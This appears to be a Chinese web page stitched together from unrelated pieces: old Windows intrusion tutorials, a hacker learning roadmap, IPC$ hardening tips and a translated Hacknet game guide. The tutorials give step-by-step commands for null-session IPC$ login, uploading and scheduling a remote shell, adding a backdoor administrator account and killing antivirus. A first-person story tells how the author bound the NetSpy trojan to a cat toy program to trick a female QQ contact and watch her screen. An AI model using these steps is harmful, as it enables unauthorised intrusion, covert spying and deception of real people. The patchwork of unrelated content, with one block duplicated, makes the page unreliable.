黑客教程视频_黑客使用教程

黑客如何入侵别人的电脑。

在这里告诉大家如何入侵别人电脑，从而演绎我们那在别人电脑上无所不能的神话…

首先要确定要入侵电脑的IP，关于IP，网吧的编号和IP地址通常是相同或高一位，比如编号为

20的电脑，IP一般是192.168.0.20或192.168.0.21… 大家要是上贴吧匿名发帖子的话，也会

看见IP地址…

有了IP地址后，就可以连接那将被你入侵的倒霉电脑了，一般登陆电脑的用户名多是“user编号”

的形式空密码形式，所以在“命令提示符”下输入net use //IP地址/ipc$""/user:""及

net use //IP地址/ipc$""/user:"user编号"命令进行连接

连接成功后必须关闭对方电脑的杀毒软件，右击“我的电脑”，选择“管理”在弹出窗口中右击

“计算机管理（本地）”，选择“连接另一台计算机”，连接至那台倒霉电脑的IP号，启动

“Tenlet”服务

然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。

net user user编号/add

net localgroup administators user编号/add

然后进入C:\Winnt\System32,右击CMD.EXE，选择“创建快捷方式”，然后右击快捷方式，选择

“属性”，选择“以其他用户身份运行”，运行快捷方式CMD，弹出“以其他用户身份运行”窗

口后，输入“user编号”回车

用telnet 电脑IP编号 登陆至那个倒霉孩子的电脑，再从网上下载一个命令行下杀进程的软件，

比如说knlps等，在telnet上将杀毒软件进程关闭

这样就OK了

做你想做的事吧……，呵呵…，有兴趣的…试试

黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。 现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法:

1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。

2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明

4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名

5.开DOS窗口键入 NBTSTAT -R

6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

问：黑客怎么能进入别人的电脑？

黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。 现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。 2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。 以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

在TTY的网络休闲庄的第十八期电子杂志中，看到TTY写的怎样使用“网络精灵”在IE中看中了木马的电脑的屏幕，看完后自己就亲自实验了一把，今天我要给大家讲一下我是怎样用“网络精灵”这个软件入侵别人的计算机的。

我也是一个网络新手，如果您是一名网络高手那就不要继续看下去了，呵。。我们都知道冰河木马可以入侵网络上的计算机，“网络精灵”也是一个和冰河性质相同的木马软件，但是它有一个特点就是可以直接在IE浏览器中看到对方电脑的屏幕，虽然冰河也有着同样的功能，而且还能实时的看到对方的屏幕和控制对方的电脑，但是我从来没有真正的用冰河看到过对方的屏幕，可能是因为网速太慢的原因吧，不知道大家有没有看到过。

什么是黑客木马软件呢，这里只是对网络新手来说的，个人理解吧，简单的说木马软件一般都分两部分，也就是说至少有两个文件，其中一个文件是“木马服务器端”，顾名思义“服务器端”就是为“工作端”服务的，怎么服务呢，它把中了木马的电脑里的几乎所有的资源和我们在本地电脑上可以看到的和能操作的功能全都传送给了工作站端，在工作端全都会展现出来的，在工作站端操作中了木马的服务器端的电脑就和操作本地电脑没有什么太大的区别的。所以不要在自己的电脑上执行”木马服务器端“，谁执行谁中招。

那另一个文件就是木马“工作站端”了，主要是用来控制中了“木马服务器端”软件的计算机，我们要想控制网上的别人的计算机就必须事先在他的电脑里执行“木马服务器端”软件，问题就在于我们怎样才能让别人执行你的木马软件呢，相信没有人会乖乖的让你去给他中木马的。

办法有很多，我只说一下我是怎样给别人中的“网络精灵”的“服务器端”，大家可以去网络休闲庄下载“网络精灵”（休闲庄“中文软件”2001年3月12日有下载），我的网站上也有的，我很喜欢收藏休闲庄的精典软件，放到自己作的网站上主要是为了自己用的时候方便，到什么地方上网都可以到自己的网站去下载，免去了到处查找的麻烦。

下载完了“网络精灵”把它解压缩后，其中就一个文件名netspy.exe这个文件就是木马服务器端，所以不要乱点它呀，我将要把它用OICQ的文件传输功能传送给对方，这个文件执行后会没有什么反应的，而且还会把自己本身删除掉，把自己的另一份复制WIndows\system子目录中，这就是木马的隐蔽性了，只要你中了木马每次启动电脑它都会自动执行的，就象幽灵一样缠着你，怎样御载你去问TTY吧。

我们总不能就这样把这个软件送给对方吧，如果这样送的话一定会引起对方的怀疑的，怎么办呢，现在的网络世界真是五彩滨纷什么样的软件都有，竟然有这样的软件可以把两个可执文件捆绑一块的软件，然后生成另一个新的文件，只要执行这个新生成的文件，那么两个软件就同时执行了。

所以为了伪装一下“木马”，我们就去休闲庄下载第二个捆绑软件吧，（在休闲庄的2000年12月12日里有下载的）一共有三个这样的软件，就用那个中文的吧，解压缩后会有一个文件名为exeBinder.exe的可执行文件，现在“木马”有了，捆绑软件有了，可不要现在就急着去捆绑呀，你把木马和谁捆绑在一起呀，总不能把木马和木马捆绑在一起吧！，我还真的没有试过把两只不同的木马捆绑在一起是什么样子，呵。。，所以你还得下载一个和木马捆绑在一起的软件，而且尽量是一个有趣的小软件，以便能达到伪装的目的。

这些软件休闲装都为你准备好了，在同期有四个这样的小的软件，我下载的是那只凯帝猫，文件名为kitty.zip，当时下载的时候还以为TTY是根据那只凯帝猫起的网名呢，问了TTY才知道“TTY”是电脑终端的意思的。

好了现在所有的软件都找齐了，那就开始捆绑吧！首先执行exebinder.exe这个文件，在“执行文件一”和“执行文件二”中分别添入那只“凯帝猫”runkitty.exe和“木马”netspy.exe，然后在目标文件中给要生成的第三个捆绑文件起一个文件名，我起的是kitty,生成了KItty.exe这个文件后，我们现在就可以把它发给你的OICQ中哪个倒楣的网友了。

为了不引起怀疑我就对我的网友说（她是一个女孩），我最近弄到一个很好玩的软件，是一只可以在你的电脑屏幕上来回走动的凯帝猫，为了达到她能接收你的软件（其实是木马）的目的，你还可以把那只凯帝猫描述的多么的可爱，一般女孩子都会中招的，我的网友就在我的一片描述声中接收了那只凯帝猫还有和猫在一起的木马，当然她不会知道其中藏有木马，她接收后一定会执行那个文件的，因此她就中了你的木马了，当然她不会知道其中有木马的，只能看到那只凯帝猫在屏幕上走动，而且她还会向你道谢的。

之后我们作什么呢，当然是要让“木马服务器端”为我们服务了，看一看她都在什么了，按照TTY所说的方法在IE的地址栏里输入她的IP地址和“网络精录的端口”7308，不知道对方的IP怎么办呀，你去休闲庄下载一个OICQ查IP的补丁就可以了，不要弄错了你的OICQ版本呀，你不会要问我怎样才能知道我的OICQ版本吧，那我告诉你吧，用鼠标点OICQ窗口最下面“OICQ”这四个字母，然后会弹出一个菜单，点关于你就会看到你的OICQ版本了，由于腾讯为了安全的问题，不断的升级她的OICQ的版本，所以OICQ的补丁也在不断的升级。

补丁当然不是腾讯作的了，下载完成后把那个文件解压缩可以看到一个OICQ.exe的文件，把这个文件复制到OICQ子目录中c:\Program Files\OICQ，然后运行OICQ我们就可以直接在OICQ的回复信息的窗口的左边看到对方的IP地址了。

现在我们就在IE地址栏里输入对方的IP吧，比如说对方的IP是192.168.0.3,我们就应该这样输入,然后回车吧，呵。。对方的屏幕就会展现在你面前了，呵。。。不过只是一张图片，所以我们可以不断的刷新就可以看到她都在作什么了。一边在OICQ中和她聊天一边看她都在作什么，呵。。。有意思吧，我把我的网友搞得弄的莫名奇妙的，她还以为我就在她旁边呢。

如果你要完全的控制她的计算机，那就要运行工作站端软件NetMonitor.exe,把中了木马的电脑的IP添进去就可以了，你就差不多可以象使用WIN98中的资源管理器一样使用对方的电脑了，还有很多的功能自己研究吧，不过和冰河相比功能就少了许多。

我曾经用冰河，看到了对方的上网帐号还有电脑里的各种密码，不过我感觉这个软件很适合于象我这样的初学者使用。在这次简单的入侵中可以看出，我只是用了一个很简单的方法就进入了别人的电脑，所以每个上网的人犹其是在家中上网的人都应该多多少少的学习一下必要的网络安全知识，要不然你在别人的监视之下你都不知道，真的象TTY所说的自己会象没有穿衣服的人一样，裸露在大庭广众之下，所以只要你上网，无论你喜不喜欢，网络安全知识都是你的必修之课。 顺便说一下为了防止象我这样的网络新手（我这样的新手在网上实在是太多了）总是用各种IP炸弹和黑客软件拿别人作试验，我认为比较简单的方法就是安装“天网防火墙”，它可以防住大部分黑客软件的入侵和各种IP炸弹。

黑客入门教程

可以说想学黑客技术，要求你首先是一个“T”字型人才，也就是说电脑的所有领域你都能做的来，而且有一项是精通的。因此作为一个零基础的黑客爱好者来说，没有良好的基础是绝对不行的，下面我就针对想真正学习黑客的零基础朋友制作一个学习方案，注意！我是指“真正想学黑客技术”的朋友，如果你只是想玩玩，花一上午时间学学怎样用各种工具就可以了。

一、前期

1、了解什么是黑客，黑客的精神是什么。当然了解一下几大着名黑客或骇客的“发家史”也是很有必要的。

2、黑客必备的一些基础命令，包括DOS命令，以及UNIX / Linux下的命令。

3、远程扫描、远程刺探技术。包括通过系统自带命令的信息刺探以及使用工具扫描等。

4、密码破解。了解现在的密码破解的适用范围，以及操作技巧等等。

5、溢出攻击。溢出工具的使用方法。

6、注入攻击。注入攻击只是一个简称，这里还要包括XSS、旁注、远程包含等一系列脚本攻击技巧。

7、学会各种编译工具的使用方法，能编译所有ShellCode。

8、学会手动查杀任何木马、病毒，学会分析Windows操作系统，以使自己百毒不侵。

二、中期

1、学习所有Windows下服务器的搭建步骤（ASP、PHP、JSP）。

2、掌握例如Google黑客、cookies 、网络钓鱼、社会工程学等等等等。

3、学习HTML、JavaScript、VBScript。

4、学习标准SQL语言，以及大多数数据库的使用。

5、学习ASP，并拥有发掘ASP脚本漏洞的能力。

6、学习PHP，并拥有发掘PHP脚本漏洞的能力。

7、学习JSP，并拥有发掘JSP脚本漏洞的能力。

8、学习掌握最新脚本的特性性以及发掘漏洞的方法，例如眼下的WEB2.0。（A1Pass注：此文写于2007年8月）

三、后期

1、确定自己的发展方向

2、学习C语言，并尝试改写一些已公布的ShellCode。

3、学习C++，尝试编写一个属于自己的木马（如果你想自己编写木马的话）。

4、学习汇编

5、研究Linux系统内核。

6、学习缓冲区溢出利用技术。

7、ShellCode技术。

8、堆溢出利用技术、格式化串漏洞利用技术、内核溢出利用技术、漏洞发掘分析。

如果大家有什么不明白的，可以到百度或Google搜索，加重的黑体字即位关键字。

这里只是为大家列了一个大纲，不可能面面俱到，而且我自己也还没到达到最后的那个级别，所以肯定会有一些错误以及值得商榷之处，如果哪位网友看到了这篇文章，并发现了不妥之处

黑客DOS命令或其它命令入侵他人电脑的具体步骤?

IPC$入侵

一 唠叨一下：

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.

不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).

因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!

二 什么是ipc$

IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:

1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。

也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)

2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接

3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用

就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!

(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)

不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(

因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.

所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系

以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:

不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.

许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).

2)ipc$与139,445端口:

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.

3)ipc$与默认共享

默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因

以下5个原因是比较常见的:

1)你的系统不是NT或以上操作系统;

2)对方没有打开ipc$默认共享

3)对方未开启139或445端口(惑被防火墙屏蔽)

4)你的命令输入有误(比如缺少了空格等)

5)用户名或密码错误(空连接当然无所谓了)

另外,你也可以根据返回的错误号分析原因：

错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；

错误号51，Windows 无法找到网络路径 : 网络有问题；

错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；

错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。

错误号1326，未知的用户名或错误密码 ： 原因很明显了；

错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）

错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。

关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.

六 如何打开目标的IPC$(此段引自相关文章)

首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。

七 如何防范ipc$入侵

1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)

首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享

1）察看本地共享资源

运行-cmd-输入net share

2）删除共享(每次输入一个）

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete（如果有e,f,……可以继续删除）

3）停止server服务

net stop server /y （重新启动后server服务会重新开启）

4）修改注册表

运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。

如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务

控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码，防止通过ipc$穷举密码

（本教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区原创）

八 相关命令

1)建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接

net use \\IP\ipc$ /del

5)删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式

这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

十 总结:

关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.

最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)

黑客网络新手指南翻译大全 黑客网络Hacknet新手怎么玩

黑客网络Hacknet你会玩了吗？小伙伴们是不是正在为看不懂英文而烦恼呢，不要烦恼，今日小编为大家带来最全的新手指南，全中文翻译哦，感兴趣的玩家赶紧来看看吧！

Basic Tips 基础窍门

***IMPORTANT*** Some computers/servers may have different names on them, but what you need to do should be the same. Just follow the steps, you will be fine.

***非常重要*** 有些电脑/服务器可能有不同的名字，但你所要做的应该相同。遵循如下步骤，您就不会有问题。

DON'T abandon any missions atm!! It will most likey cause serious problems and make you unable to finish the game!

眼下，***请勿***放弃任何任务!!这很可能导致严重问题并最终无法完成游戏，毁掉您的存档!

1, Type commands as soon as possible.

2, Delete logs when you disconnect.

3, You need to reply almost every time you finish a mission.

4, Always use "Scan Network" option when you successfully hack a computer.

5, Don't delete/rename files unnecessarily. -This is important!!

6, Use auto-complete for commands and file names. (Tab key)

7, Always use "admin" "alpine" to log in to any eos devices.

1.尽速输入指令。(译者：更要善用Tab)

2.断线前别忘了删log。(译者：虽然我不删也没有什么麻烦……)

3.不要忘了完成任务时回复邮件。(极少数情况不需要)

4.成功骇入电脑时总扫描一遍主机。(译者：★★★★★推荐)

5.无必要时不要删除/重命名任何文件!—十分重要。

6.使用“自动拼写”(Tab键)输入指令及文件名。

7.不要忘了“admin”“alpine”这神奇的eos设备账户。

译者：即使你希望独立完成游戏，我也非常推荐您阅读这些提示，它们非常有用。另外我在此补充几条。

(但愿我没记错……)

1.SQL的入侵工具和KBT，即104端口入侵工具可以忽视Proxy和Firewall。

2.Firewall和Proxy的破解是独立的，你可以一边破解proxy一边analysis。更有甚者，用Tracekill可以允许您慢悠悠地破解完Firewall，再攻破proxy。

3.在shell里按overload破解proxy，对吧?然而如果内存不足，这些窗口会折叠，并在内存足够时展开。(如果我说的不清楚，可以试着在您的电脑上运行一堆shell并点按trap，然后关掉其中一个窗口。)除了略有点壮观以外，这是个“储存”足够多shell的小技巧。

4.不过，5~7个shell一般够了。

5.在几次analyze后弹出的几行文字里应该会各有一个字符，如果某一行里全是”0”怎么办?有时这意味着所对应的代码就是0。例如：(只是示范)

0 0 0 0 0 0 0 0 0 0 2 0 0 0

0 0 0 0 0 5 0 0 0 0 0 0 0 0

0 0 0 0 0 0 0 0 0 0 0 0 0 0

结果就是250。(我才不是250呢!)

Troubleshooting Common Problems

Q, I don't get an email to start a new mission!! What do I do now!?

A, Make sure to check following things:

1, Your previous mission has finished. (Click "Reply" in the email for it and see if "Mission Incomplete" message shows up.)

2, You don't have any available missions in your current faction's contracts server. (Or the message board if you're working on /el missions.)

3, Restart your game and your problem is still there.

常见问题解决方案。(疑难杂症)

Q：我得不到开始新任务的邮件!!我该怎么办!

A：出门检查您的邮筒(划掉)。请确认您已检查过以下条件。

1.你上一个的任务已完成。[尝试点按邮件中的“Reply”(回复)看会不会出现“Mission incomplete”(任务未完成)。]

2.在您现在所处的派系(Entropy，CSEC，…)没有可用的任务，或者

在/el任务里信息板上没有任务。

3.重启游戏问题仍存在。

For "gg wp" from Naix, you need to revenge Naix BEFORE you start any new Entropy mission. Details in "Naix Missions" section below.

对于Naix的“友善问好”，你要在完成Entropy任务***之前***对Naix报仇。下面的“Naix任务”一栏会给您帮助。

If none of these helps you, you might have had a critical bug... The devs are working on an update to fix many bugs, so wait for it... Meanwhile, you still can try 2 options:

1, Editing your save data (Here's the link: http:// Be super careful with your savedata.)

2, Start a new session (This is much easier... You also can work on achievements that you missed.)

若以上几条都不起作用，您已无药可救了(划掉)。您可能遇到了一个严重的bug(您不会连bug也不知道吧?)。开发者们(们?)在致力于更新游戏以修正bug。所以只能等了。

在此时，您可以尝试以下方法。

1.编辑您的存档。(敬参阅{链接已删除}请特别小心对待您的存档)

2.再开个存档。(不仅简单多了，还可以去做您以前忽略的成就。)

Q, I don't have the necessary exe file to do this mission!! UGGHHHH

A, Here is the list of exe files, and in which mission you can find them. Use "CTRL+F" on this guide and search for them.

Q.我怎么没有做任务所需的工具!!啊啊啊!!

A.这是exe文件列表及其来源，用"CTRL+F"在这指南里搜索一下。

SecurityTracer.exe - "First Contact", or on "Credit Server" after you finish the game.

SSHcrack.exe (for port 22) - "Getting Some tools together"

FTPBounce.exe (for port 21) - "Welcome"

eosDeviceScan.exe (for finding eos device) - "eOS Device Scanning"

SMTPoverflow.exe (for port 25) - "Aggression must be punished"

WebServerWorm.exe (for port 80) - "***Revenging Naix***", or "CSEC Invitation"

SQLBufferOverflow.exe (for port 1433) - "-Shrine of Polar Star-"

SQL_MemCorrupt.exe (for port 1433) - "CSEC Invitation - Congratulations"

Decypher.exe (for decrypting files) - "Ghosting the Vault"

DECHead.exe (for analyzing .dec files) - "Through the Spyglass"

KBT_PortTest.exe (for port 104) - "Project Junebug"

TraceKill.exe (for freezing traces) - "Bit -- Foundation"

Sequencer.exe (for the final hacking) - "Bit -- Termination"

Clock.exe (Um...just a clock app) - Read "-Finding Clock.exe-"

SecurityTracer.exe(安全追踪程序) -来自 "First Contact"(第一次沟通), 或在完成游戏时的"Credit Server" (荣誉服务器)上。

SSHcrack.exe (ssh协议破解器)(适用端口 22) - "Getting Some tools together"(收集些工具)

FTPBounce.exe (ftp“跳转攻击”破解器)(适用端口21) - "Welcome"(欢迎)

eosDeviceScan.exe(eos设备搜寻器) (适用寻找eos设备) - "eOS Device Scanning"(搜寻eos设备)

SMTPoverflow.exe(邮件过载破解器) (适用端口25) - "Aggression must be punished"(侵略者必将受惩处)

WebServerWorm.exe (网络蠕虫破解器)(适用端口80) - "***Revenging Naix***"(向Naix复仇 译者：这不是一个官方给出的任务名，我没记错的话。), or "CSEC Invitation"(CSEC诚邀您到来)

SQLBufferOverflow.exe (SQL内存缓冲区过载破解器)(适用端口1433) - "-Shrine of Polar Star-"(北极星圣地)

SQL_MemCorrupt.exe(SQL_内存错误破解器) (for port 1433) - "CSEC Invitation - Congratulations"(CSEC邀请-祝贺!)

(译者：根据另一个指南，这两个SQL破解器完全一样。)

Decypher.exe (解密器)(适用解密文件) - "Ghosting the Vault"[拱顶鬼神(?)]

DECHead.exe (十六进制文件头查看器/加密文件查看器?)(适用分析加密文件) - "Through the Spyglass"(通过望远镜)

KBT_PortTest.exe[KBT端口测试器(其实也是破解器。)] (适用端口104) - "Project Junebug"(Junebug项目)

TraceKill.exe(阻止追踪) (适用冻结追踪) - "Bit -- Foundation"(Bit-支柱)

Sequencer.exe(排序器) (适用最后骇入) - "Bit -- Termination"(Bit-终局)

Clock.exe (钟)(Hmm…只是个钟的软件) - Read "-Finding Clock.exe-"(敬参阅“寻找‘Clock.exe’”)

For KBT_PortTest.exe, you can try this method if you don't get "Project Junebug" unlocked, or mistakenly abandoned it. Thank you, Elsarild!

对于KBT_PortTest.exe，若您没有解锁“Junebug项目”，或失误取消了这个任务，可以试试这个方法。谢谢您，Elsarild!

http://

Q, I can't use this command somehow!! Fuuuuuuuuuuuuuuu

A, Make sure to check if you already have the necessary exe for the command, then try typing commands like below:

Q，由于某种原因我没法用这命令!(根据相关法律法规和政策，该信息不予公布)

A，确认您已具备所需的软件，然后根据以下范例输入命令。

译者：Hacknet的命令似乎更接近Linux。

Command Template - Example

命令 样板 - 范例

scp [the file's name] - scp index.html

connect [the IP address] - connect 103.33.8.643

cd [the folder path] - cd /log

